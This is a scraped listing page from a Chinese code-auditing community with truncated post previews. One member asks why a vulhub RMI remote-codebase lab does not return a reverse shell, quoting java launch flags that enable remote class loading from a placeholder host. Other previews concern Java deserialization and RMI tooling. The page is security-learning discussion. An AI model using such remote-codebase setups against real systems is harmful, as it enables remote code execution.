你尚未登录

未加入『代码审计』知识星球的用户只能查看少量内容,且不能下载附件。 加入『代码审计』知识星球即可查看所有内容。

全部帖子 精华主题 问答帖子

phith0n

2022 一月 23
@路人甲:

尝试复现vulhub中的rmi-codebase,远程codebase上托管的payload如下,客户端调用都返回了7,怎么没有反弹shell呢,换成其他命令执行也不行。 具体步骤如下: 1.编译远程codebase上的RMIClient类及其内部类,并开启http服务; 2.运行rmiserver端,java -Djava.rmi.server.hostname=127.0.0.1 -Djava.rmi.server.useCodebaseOnly=false -Djava.security.policy=client.policy RemoteRMIServer; 3.运行rmiclient端,java -Djava.rmi.server.useCodebaseOnly=false -Djava.rmi.server.codebase=http://x.x.x.x:9980/ RMIClient 现象:http server收到了获取class的请求;client端未报错,输出7

可以回顾一下《Java安全漫谈》第一篇文章,里面有介绍下图三种初始化的代码在Java中有什么不同: ......

图片

m0fyzl

2022 一月 23
本人web安全小白,目前......

phith0n

2022 一月 23
刚学习了一下去年Blackhat USA Arsenal的一个RMI相关的工具,叫remote-method-guesser,Githu......

附件

# 附件名 大小 时间 操作
remote-method-guesser.pdf 6.6 MB 01/23/2022

Y4tacker

2022 一月 22
给大家分享一个好玩的关于j......

附件

# 附件名 大小 时间 操作
一次jsp的奇异探索.pdf 564.9 KB 01/22/2022

andme

2022 一月 21
求助贴: 在内网用破解版的burpsuite c......

图片

阿白

2022 一月 21
求助帖: 目前网上代码审计的教程很少,对于新手来说感觉不是很友好......

圆圆和方方

2022 一月 19
关于前一阵那个......

phith0n

2022 一月 18
缩小Shiro等反序......

phith0n

2022 一月 18
2021年最高第......

图片

灯火不阑珊

2022 一月 18
求助,师......